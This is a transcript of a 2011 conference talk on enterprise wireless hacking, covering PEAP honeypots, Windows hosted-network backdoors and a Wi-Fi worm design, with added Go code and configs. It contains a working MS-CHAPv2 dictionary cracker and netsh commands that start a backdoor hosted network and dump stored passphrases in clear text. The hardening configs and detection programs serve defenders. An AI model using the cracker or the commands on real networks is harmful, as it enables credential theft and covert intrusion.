Scenario Based Hacking - Enterprise Wireless Security (Vivek Ramachandran)

Posted on 26-May-2015

DESCRIPTION

At the ClubHack 2011 Hacking and Security Conference, Vivek Ramachandran presented "Scenario Based Hacking - Enterprise Wireless Security". Speaker: Vivek Ramachandran.

Transcript

©SecurityTube.net

Scenario Based Hacking – Enterprise Wireless Security

Vivek Ramachandran

Founder, SecurityTube.net

vivek@securitytube.net


Vivek Ramachandran

WEP Cloaking Defcon 15

Caffe Latte Attack Toorcon 9

Microsoft Security Shootout

Wi-Fi Malware, 2011

802.1x, Cat65k Cisco Systems

B.Tech, ECE IIT Guwahati

Media Coverage CBS5, BBC

Trainer, 2011


In-Person Trainings


SecurityTube Online Certifications

25+ Countries


Free DVD (12+ Hours of HD Videos)

http://www.securitytube.net/downloads


Scenario Based Hacking

• Multiple courses are available from different certification bodies

• They concentrate more on tools than on their application

• Script kiddie mentality

• Real-world scenarios are not used

• Students find it tough to excel in the real world

The Real World

• Complicated scenarios

• Heterogeneous architectures

• Multiple security controls present at the same time

– Firewalls, IDS/IPS, etc.

• Requires one to be a master of all, rather than a jack of all trades

• Basically "Scenario Based Hacking"

Understanding Scenario Based Hacking

Component           Scenario 1   Scenario 2   Scenario 3   Scenario 4
Patches             X            Present      Present      Present
Personal Firewall   X            X            Present      Present
AV                  X            X            X            Present
NAT                 X            X            X            X
Firewall            X            X            X            X
IDS                 X            X            X            X
IPS                 X            X            X            X
WAF                 X            X            X            X

(X = control absent in that scenario)

Simple Scenarios

(Diagram: the attacker reaches the target directly over the Internet)

• No patches
• No AV
• No Firewall
• No Network IDS/IPS
• Direct Access (No NAT)
• …

Complicated


Interesting Ones!

Airport

Coffee Shop


Scenario Based Hacking for Wireless

• Enterprise Wireless Attacks

– PEAP

– EAP-TTLS

• Enterprise Rogue APs, Worms and Botnets


Enterprise Wireless Attacks: PEAP and EAP-TTLS

WPA-Enterprise

Parties: Supplicant (client), Authenticator (access point), Authentication Server (RADIUS)

1. Association: Supplicant <-> Authenticator
2. EAPoL Start: Supplicant -> Authenticator
3. EAP Request Identity: Authenticator -> Supplicant
4. EAP Response Identity: Supplicant -> Authenticator, relayed to the Authentication Server
5. EAP Packets (the method-specific exchange, e.g. the PEAP TLS tunnel): Supplicant <-> Authentication Server, relayed by the Authenticator
6. EAP Success and PMK to AP: Authentication Server -> Authenticator
7. EAP Success: Authenticator -> Supplicant
8. 4 Way Handshake: Supplicant <-> Authenticator (derives the session keys from the PMK)
9. Data Transfers

WPA-Enterprise

• Uses a RADIUS server for authentication

• Different supported EAP types – PEAP, EAP-TTLS, EAP-TLS, etc.

• De facto server

– FreeRADIUS www.freeradius.org

• Depending on the EAP type used, client and server will need to be configured accordingly

FreeRADIUS Wireless Pwnage Edition (FreeRADIUS-WPE)

http://www.willhackforsushi.com/FreeRADIUS-WPE.html

WPA/WPA2 Enterprise

EAP Type    Real World Usage
PEAP        Highest
EAP-TTLS    High
EAP-TLS     Medium
LEAP        Low
EAP-FAST    Low
….          ….

PEAP

• Protected Extensible Authentication Protocol

• Typical usage:

– PEAPv0 with EAP-MSCHAPv2 (most popular)

• Native support on Windows

– PEAPv1 with EAP-GTC

• Other uncommon ones

– PEAPv0/v1 with EAP-SIM (Cisco)

• Uses server-side certificates for validation

• PEAP-EAP-TLS

– Additionally uses client-side certificates or smartcards

– Supported only by Microsoft

Source: Layer3.wordpress.com

Understanding the Insecurity

• Server-side certificates

– Fake ones can be created

– Clients may not prompt, or the user may accept invalid certificates

• Set up a honeypot with FreeRADIUS-WPE

– Client connects

– Accepts the fake certificate

– Sends authentication details over MSCHAPv2 inside the TLS tunnel

– Attacker's RADIUS server logs these details

– Apply a dictionary / reduced-possibility brute-force attack using Asleap by Joshua Wright

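The dictionary step on this slide, as an added worked example (this is not code from the talk, from FreeRADIUS-WPE or from asleap): a stand-alone Go program with the MS-CHAPv2 primitives from RFC 2759 and the two shortcuts asleap relies on. Inside the PEAP tunnel the rogue RADIUS server receives the username, its own 16-byte authenticator challenge, the client's 16-byte peer challenge and the 24-byte NT-Response; FreeRADIUS-WPE logs the 8-byte challenge derived from them (SHA1(PeerChallenge || AuthenticatorChallenge || UserName), truncated to 8 bytes) next to the response, and those two values are the input used here. The NT-Response is the challenge DES-encrypted three times under 7-byte slices of the 16-byte NT hash padded with five zero bytes, so the third DES key holds only 16 unknown bits: recovering the last two hash bytes is a 65536-key search that runs before any dictionary and lets every candidate password be rejected after a single MD4. Go's standard library has no MD4, so a compact one is included; the challenge, response and expected password are the RFC 2759 section 9.2 test vectors and the word list is constructed.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"unicode/utf16"
)

// md4 implements RFC 1320; Go's standard library ships no MD4 and NT hashes need it.
func md4(msg []byte) [16]byte {
	st := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	n := (len(msg)+8)/64*64 + 64 // padded length: room for the 0x80 byte and the 64-bit bit count
	m := make([]byte, n)
	copy(m, msg)
	m[len(msg)] = 0x80
	binary.LittleEndian.PutUint64(m[n-8:], uint64(len(msg))*8)
	shifts := [3][4]int{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}
	for off := 0; off < n; off += 64 {
		var x [16]uint32
		for i := range x { x[i] = binary.LittleEndian.Uint32(m[off+4*i:]) }
		a, b, c, d := st[0], st[1], st[2], st[3]
		for i := 0; i < 48; i++ { // rotating (a,b,c,d) after each step lets one expression serve all 48
			r, t := i/16, a
			switch r {
			case 0: t += ((b & c) | (^b & d)) + x[i]
			case 1: t += ((b & c) | (b & d) | (c & d)) + x[(i%4)*4+(i%16)/4] + 0x5a827999
			default: t += (b ^ c ^ d) + x[bits.Reverse8(uint8(i%16))>>4] + 0x6ed9eba1 // bit-reversed word order
			}
			a, b, c, d = d, bits.RotateLeft32(t, shifts[r][i%4]), b, c
		}
		st[0], st[1], st[2], st[3] = st[0]+a, st[1]+b, st[2]+c, st[3]+d
	}
	var out [16]byte
	for i, v := range st {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is the RFC 2759 NtPasswordHash: MD4 over the UTF-16LE encoded password.
func ntHash(password string) [16]byte {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) { buf = append(buf, byte(u), byte(u>>8)) }
	return md4(buf)
}

// desBlock encrypts one block under a 7-byte key spread to DES's 8-byte form.
func desBlock(key7, block []byte) []byte {
	k := make([]byte, 8)
	for i := 1; i < 7; i++ { k[i] = key7[i-1]<<uint(8-i) | key7[i]>>uint(i) }
	k[0], k[7] = key7[0], key7[6]<<1 // parity bits (LSBs) are ignored by the DES key schedule
	c, _ := des.NewCipher(k)          // the only error is a wrong key length, impossible here
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntResponse is RFC 2759 ChallengeResponse: three DES encryptions of the challenge under 7-byte slices of hash||00 00 00 00 00.
func ntResponse(challenge []byte, hash [16]byte) []byte {
	z := append(hash[:], 0, 0, 0, 0, 0) // 21 bytes, so the third key carries only hash[14:16]
	var r []byte
	for i := 0; i < 21; i += 7 { r = append(r, desBlock(z[i:i+7], challenge)...) }
	return r
}

// recoverHashTail brute-forces hash[14:16] from response[16:24]: at most 65536 DES encryptions.
func recoverHashTail(challenge, response []byte) (uint16, bool) {
	for t := 0; t < 1<<16; t++ {
		if bytes.Equal(desBlock([]byte{byte(t >> 8), byte(t), 0, 0, 0, 0, 0}, challenge), response[16:24]) {
			return uint16(t), true
		}
	}
	return 0, false
}

// crackMSCHAPv2 is the dictionary attack; the recovered tail rejects most candidates after one MD4.
func crackMSCHAPv2(challenge, response []byte, wordlist []string) (string, bool) {
	tail, ok := recoverHashTail(challenge, response)
	for _, w := range wordlist {
		if h := ntHash(w); ok && binary.BigEndian.Uint16(h[14:]) == tail && bytes.Equal(ntResponse(challenge, h), response) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Constructed input: the RFC 2759 section 9.2 vectors stand in for one FreeRADIUS-WPE log entry.
	chal, _ := hex.DecodeString("D02E4386BCE91226")
	resp, _ := hex.DecodeString("82309ECD8D708B5EA08FAA3981CD83544233114A3D85D6DF")
	pw, found := crackMSCHAPv2(chal, resp, []string{"password", "Summer2011", "clientPass"})
	fmt.Printf("password=%q found=%v\n", pw, found)
}
```

`go run` on the file prints `password="clientPass" found=true`. The point for a defender is that nothing in this computation involves the certificate: once a client hands its MSCHAPv2 exchange to a server it never validated, the password's strength is the only remaining control, and a typical domain password policy does not hold up against an offline search at DES speed.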

Windows PEAP Hacking Summed Up in 1 Slide


Demo of Enterprise Wireless Attacks PEAP


EAP-TTLS

• EAP-Tunneled Transport Layer Security

• Server authenticates with Certificate

• Client can optionally use Certificate as well

• No native support on Windows

– 3rd party utilities to be used

• Versions

– EAP-TTLSv0

– EAP-TTLSv1


Demo of Enterprise Wireless Attacks EAP-TTLS


Can I be Secure? EAP-TLS

• Strongest security of all the EAPs out there

• Mandates use of both Server and Client side certificates

• Required to be supported to get a WPA/WPA2 logo on product

• Unfortunately, this is not very popular due to deployment challenges

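What "being secure" looks like on the supplicant side, as an added example in wpa_supplicant syntax (not from the talk): the SSID, identity, password, CA bundle path and RADIUS server name are placeholders. The first network block is the configuration the honeypot attack needs; the second pins the CA and the server's name so a FreeRADIUS-WPE certificate is refused before any MSCHAPv2 exchange happens; the third is the EAP-TLS deployment this slide recommends, where there is no password for asleap to guess.

```conf
# 1. Weak: PEAP/MSCHAPv2 with no CA pinned. Any server certificate is accepted,
#    so a FreeRADIUS-WPE honeypot gets the MSCHAPv2 exchange and can crack it offline.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="Summer2011"
    phase2="auth=MSCHAPV2"
}

# 2. Hardened PEAP: the server certificate must chain to the corporate CA and carry the
#    expected name; the outer identity hides the real username from the air.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@corp.example"
    identity="alice"
    password="Summer2011"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}

# 3. EAP-TLS: mutual certificates, nothing password-derived crosses the tunnel.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="alice@corp.example"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    client_cert="/etc/wpa_supplicant/alice.crt"
    private_key="/etc/wpa_supplicant/alice.key"
    domain_suffix_match="radius.corp.example"
}
```

The Windows equivalent lives in the PEAP properties dialog: "Validate server certificate", the expected RADIUS names under "Connect to these servers", only the corporate root CA ticked, and "Do not prompt user to authorize new servers or trusted certification authorities" so the user cannot click through a warning. `domain_suffix_match` requires wpa_supplicant 2.1 or newer; on older builds the fallback is `subject_match`, a substring check and correspondingly weaker.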

Enterprise Rogue APs, Backdoors, Worms and Botnets


Objective

• How malware could leverage Wi-Fi to create

– Backdoors

– Worms

– Botnets

Background – Understanding Wi-Fi Client Software

• Allows the client to connect to an Access Point

• First time the user approves it; auto-connect for future instances

• Details are stored in configuration files

Command Line Interaction?

• Scanning the air for stored profiles

• Profiling the clients based on searches

• Different clients behave differently

• Demo


See All Wi-Fi Interfaces

netsh wlan show interfaces

Drivers and Capabilities

netsh wlan show drivers

Scan for Available Networks

netsh wlan show networks

View Existing Profiles

netsh wlan show profiles

Starting a Profile

netsh wlan connect name="vivek"

Export a Profile

netsh wlan export profile name="vivek"

Creating an Access Point on a Client Device

• Requirement for special drivers and supported cards

• Custom software used – hostapd, airbase-ng

• More feasible on Linux-based systems

Generation 2.0 of Client Software – Hosted Network

• Available from Windows 7 and Server 2008 R2 onwards

• Virtual adapters on the same physical adapter

• SoftAP can be created using virtual adapters

– DHCP server included

"With this feature, a Windows computer can use a single physical wireless adapter to connect as a client to a hardware access point (AP), while at the same time acting as a software AP allowing other wireless-capable devices to connect to it." http://msdn.microsoft.com/en-us/library/dd815243%28v=vs.85%29.aspx

Feature Objective

• To allow creation of a wireless Personal Area Network (PAN)

– Share data with devices

• Internet Connection Sharing (ICS) with other devices on the network

Demo of Hosted Network

Demonstration


Creating a Hosted Network


Driver Support


Client still remains connected to hard AP!


Wi-Fi Backdoor

• Easy for malware to create a backdoor

• The key could be:

– Fixed

– Derived from the MAC address of the host, time of day, etc.

• As the host remains connected to the authorized network, the user does not notice a break in connection

• No message or prompt displayed

Understanding Rogue Access Points

(Diagram: a Rogue AP attached to the network)

Makes a Rogue AP on every Client!

(Diagram: each infected client becomes its own Rogue AP)

Best Part – No Extra Hardware!

Advantages?

(Diagram: the victim stays connected to the Internet through the authorized network while the attacker reaches it over the "Wicked Network", the hosted network the malware created)

Why is this cool?

• Victim will never notice anything unusual unless he visits his network settings, and has to be decently technical to understand them

• Attacker connects to the victim over a private network

– No wired-side network logs: firewalls, IDS, IPS

– Difficult, if not impossible, to trace back

– Difficult to detect even while the attack is ongoing

• Abuses a legitimate feature, not picked up by AVs or anti-malware

• More stealth? Monitor the air for other networks; when a specific network comes up, then start the backdoor
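Those stealth properties concern the wired side; on the host itself the hosted network is visible to anyone who asks for it. As an added example (not code from the talk), the Go program below runs `netsh wlan show hostednetwork`, parses the answer and reports a started or merely allowed hosted network, the kind of check an endpoint audit or login script could run across a fleet. The backdoor the slides describe is set up with `netsh wlan set hostednetwork mode=allow ssid=<name> key=<passphrase>` followed by `netsh wlan start hostednetwork`, and that state is what the check looks for. The parser is label-based and assumes English-locale Windows 7 / Server 2008 R2 output; the sample embedded in the program is constructed from that layout so the code still runs, falling back to the sample, on a machine without netsh.

```go
package main

import (
	"bufio"
	"fmt"
	"os/exec"
	"strconv"
	"strings"
)

// HostedNetwork holds what "netsh wlan show hostednetwork" reports on Windows 7 / Server 2008 R2.
type HostedNetwork struct {
	Mode, SSID, Status, BSSID string
	Clients                   int
	Peers                     []string // MAC addresses of connected clients
}

// parseHostedNetwork is a label-based parser for the English-locale netsh output.
// Value lines look like "    Status                 : Started"; connected clients are
// listed as "        <mac>        Authenticated" under "Number of clients".
func parseHostedNetwork(out string) HostedNetwork {
	var hn HostedNetwork
	sc := bufio.NewScanner(strings.NewReader(out))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if f := strings.Fields(line); len(f) == 2 && strings.Count(f[0], ":") == 5 {
			hn.Peers = append(hn.Peers, strings.ToLower(f[0]))
			continue
		}
		kv := strings.SplitN(line, ":", 2) // labels never contain ':'; values (the BSSID) may
		if len(kv) != 2 {
			continue
		}
		key, val := strings.TrimSpace(kv[0]), strings.TrimSpace(kv[1])
		switch key {
		case "Mode":
			hn.Mode = val
		case "SSID name":
			hn.SSID = strings.Trim(val, "\"")
		case "Status":
			hn.Status = val
		case "BSSID":
			hn.BSSID = strings.ToLower(val)
		case "Number of clients":
			hn.Clients, _ = strconv.Atoi(val)
		}
	}
	return hn
}

// audit turns the parsed state into findings. A started hosted network on a domain laptop is the
// backdoor from the talk; an allowed-but-stopped one is the precondition the malware needs.
func audit(hn HostedNetwork) []string {
	var findings []string
	switch {
	case strings.EqualFold(hn.Status, "Started"):
		findings = append(findings, fmt.Sprintf("hosted network %q is STARTED on BSSID %s with %d client(s) %v",
			hn.SSID, hn.BSSID, hn.Clients, hn.Peers))
	case hn.SSID != "":
		findings = append(findings, fmt.Sprintf("hosted network %q is configured but not started", hn.SSID))
	}
	if strings.EqualFold(hn.Mode, "Allowed") {
		findings = append(findings, "hosted network mode is Allowed; harden with: netsh wlan set hostednetwork mode=disallow")
	}
	return findings
}

// queryHost runs netsh on a Windows machine; elsewhere it returns an error and the sample is used.
func queryHost() (string, error) {
	out, err := exec.Command("netsh", "wlan", "show", "hostednetwork").CombinedOutput()
	return string(out), err
}

// sampleOutput is constructed to mirror the Windows 7 layout; it was not captured from a real host.
const sampleOutput = `
Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "vivek"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : 02:11:22:33:44:55
    Radio type             : 802.11n
    Channel                : 6
    Number of clients      : 1
        aa:bb:cc:dd:ee:ff        Authenticated
`

func main() {
	out, err := queryHost()
	if err != nil {
		fmt.Println("netsh not available, auditing the constructed sample instead:", err)
		out = sampleOutput
	}
	for _, f := range audit(parseHostedNetwork(out)) {
		fmt.Println("[!]", f)
	}
}
```

Remediation is a single command, `netsh wlan set hostednetwork mode=disallow`, which prevents the hosted network from being started until it is allowed again; enforce it by script or policy rather than trusting the default, since malware running with local administrator rights can flip it back.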

Chaining Hosted Networks like a proxy?

• Each node has client and AP capability

• We can chain them to "hop" machines

• Final machine can provide Internet access

• Like Wi-Fi repeaters

Chaining Infected Laptops

(Diagram: Authorized AP <- Client | AP <- Client | AP <- Client | AP; each infected laptop is a client of the previous hop and an AP for the next)

Package Meterpreter for full access?

• Once attacker connects to his victim, he would want to have access to everything

• Why not package a Meterpreter with this?

• How about a Backdoor post-exploitation script for Metasploit?


Demo

Coupling Hosted Network with Metasploit


Increasing Stealth

• Passive monitoring for SSIDs available

• Trigger SSID causes the Wicked Hosted Network to start and create an application-level backdoor

• Attacker connects and does his job

• Shuts off the Trigger SSID and the malware goes back to passive monitoring

Karmetasploit

• Victim connects by mistake or misassociation

• Victim opens a browser; Metasploit browser_autopwn exploits the system

• Hacker gets access!

• Biggest challenge – victim notices he is connected to the wrong network and disconnects

Enhancing Karmetasploit

• Upon exploitation, create the hosted network backdoor

• User disconnects, but this hosted network still remains active

• Attacker connects via this network

What about older clients and other OSs?

• Windows < 7 and Mac OS do not have the Hosted Network or a similar feature

– Use Ad-Hoc networks

– Use a connect-back mechanism

• When a particular SSID is seen, connect to it automatically

• Blurb reporting "Connected to ABC"

– Could we kill it?

Dissecting Worm Functionality

(Diagram: Worm = Exploit + Propagation Technique)

Hosted Network Encryption

• Uses WPA2-PSK for encryption

• Key is encrypted in the configuration file

• Can be decrypted

• What if there is an office network configured on the same machine with WPA2-PSK?

1. Infect Authorized Computer and Decrypt Passphrase

– Decryption routine, or alternatively dump and copy the profile

2. Create a Soft Access Point with the same Credentials

(Diagram: the worm-infected laptop advertises a second "OfficeAP")

3. Signal Strength Game

(Diagram: the worm's "OfficeAP" competes with the real OfficeAP on signal strength)

4. Hop and Exploit

(Diagram: a client hops to the worm's OfficeAP and is exploited)

5. Replicate and Spread

(Diagram: each newly infected laptop advertises its own "OfficeAP")

Worm's Wi-Fi Network Signal Strength > AP

(Diagram: multiple OfficeAP clones surrounding the real one)

Wi-Fi Worm

• Retrieve the network key for the network

• Create a hosted network with the same name

• When the victim is in the vicinity of his office, the worm can be activated

• At some point the signal strength may be higher than the real AP's

• Other colleagues' laptops may hop and connect – conference rooms, coffee and break areas
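Detecting the worm's clone from the client side, as an added example that is not code from the talk: a Go program that runs `netsh wlan show networks mode=bssid`, parses every BSSID seen for every SSID, and flags any BSSID that advertises a managed SSID but is not on the allowlist of real access points. For each rogue it records whether it is stronger than the strongest authorized AP in the same scan (the "signal strength game" condition under which clients roam to it) and whether the MAC has the locally administered bit set, meaning it was generated in software rather than assigned by a vendor. On step 1 of the worm: with local administrator rights the office passphrase needs no decryption routine on Windows 7, since `netsh wlan show profile name="OfficeAP" key=clear` prints it, which is what the "dump and copy" alternative amounts to. The allowlist, SSID names and embedded sample scan are constructed; the parser assumes English-locale netsh output.

```go
package main

import (
	"fmt"
	"os/exec"
	"strconv"
	"strings"
)

// BSS is one access point (BSSID) seen advertising an SSID in "netsh wlan show networks mode=bssid".
type BSS struct {
	SSID, BSSID     string
	Signal, Channel int
}

// parseScan is a label-based parser for the English-locale output: an "SSID n : name" line opens a
// network, each "BSSID n : mac" line under it opens an entry, and the indented Signal/Channel lines
// belong to the most recent entry.
func parseScan(out string) []BSS {
	var list []BSS
	ssid := ""
	for _, raw := range strings.Split(out, "\n") {
		kv := strings.SplitN(strings.TrimSpace(raw), ":", 2)
		if len(kv) != 2 {
			continue
		}
		key, val := strings.TrimSpace(kv[0]), strings.TrimSpace(kv[1])
		switch {
		case strings.HasPrefix(key, "BSSID"): // must be tested before "SSID", which is its suffix
			list = append(list, BSS{SSID: ssid, BSSID: strings.ToLower(val)})
		case strings.HasPrefix(key, "SSID"):
			ssid = val
		case key == "Signal" && len(list) > 0:
			list[len(list)-1].Signal, _ = strconv.Atoi(strings.TrimSuffix(val, "%"))
		case key == "Channel" && len(list) > 0:
			list[len(list)-1].Channel, _ = strconv.Atoi(val)
		}
	}
	return list
}

// Finding is an unauthorized BSSID advertising a managed SSID.
type Finding struct {
	BSS                 BSS
	StrongerThanReal    bool // louder than every authorized AP seen for that SSID, so clients will roam to it
	LocallyAdministered bool // U/L bit set: the MAC was made up in software, not assigned by a vendor
}

// findEvilTwins compares the scan against authorized, a map from managed SSID to the set of lowercase
// BSSIDs of the real access points. SSIDs absent from the map are ignored.
func findEvilTwins(scan []BSS, authorized map[string]map[string]bool) []Finding {
	best := map[string]int{} // strongest authorized signal per SSID in this scan
	for _, b := range scan {
		if authorized[b.SSID][b.BSSID] && b.Signal > best[b.SSID] {
			best[b.SSID] = b.Signal
		}
	}
	var out []Finding
	for _, b := range scan {
		if authorized[b.SSID] == nil || authorized[b.SSID][b.BSSID] {
			continue // SSID not managed, or a known-good AP
		}
		first, _ := strconv.ParseUint(strings.SplitN(b.BSSID, ":", 2)[0], 16, 8)
		out = append(out, Finding{b, b.Signal > best[b.SSID], first&0x02 != 0})
	}
	return out
}

// sampleScan is constructed to mirror the netsh layout; 02:aa:... is a locally administered address.
const sampleScan = `
SSID 1 : OfficeAP
    Authentication          : WPA2-Personal
    BSSID 1                 : 00:11:22:33:44:55
         Signal             : 62%
         Channel            : 6
    BSSID 2                 : 02:aa:bb:cc:dd:ee
         Signal             : 94%
         Channel            : 6

SSID 2 : GuestNet
    Authentication          : Open
    BSSID 1                 : 00:11:22:33:44:66
         Signal             : 40%
         Channel            : 11
`

func main() {
	authorized := map[string]map[string]bool{"OfficeAP": {"00:11:22:33:44:55": true}} // constructed allowlist
	out, err := exec.Command("netsh", "wlan", "show", "networks", "mode=bssid").CombinedOutput()
	if err != nil {
		fmt.Println("netsh not available, checking the constructed sample scan:", err)
		out = []byte(sampleScan)
	}
	for _, f := range findEvilTwins(parseScan(string(out)), authorized) {
		fmt.Printf("[!] rogue %s on SSID %q ch%d signal %d%% stronger=%v locally-administered=%v\n",
			f.BSS.BSSID, f.BSS.SSID, f.BSS.Channel, f.BSS.Signal, f.StrongerThanReal, f.LocallyAdministered)
	}
}
```

netsh signal percentages are not calibrated, so comparing the rogue with the best authorized BSSID seen by the same card at the same moment is what makes the stronger-than check meaningful; a wireless IDS with dedicated sensors does the same job with better radios, but this version can run on every laptop the worm would target.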

Why is this interesting?

• Worm uses its own private Wi-Fi network to propagate

• Does not use the wired LAN at all

• Difficult for network defenses to detect and mitigate

• Targeted APT against an enterprise

Demo


On the Run


APIs for the Hosted Network Feature


Questions?

vivek@securitytube.net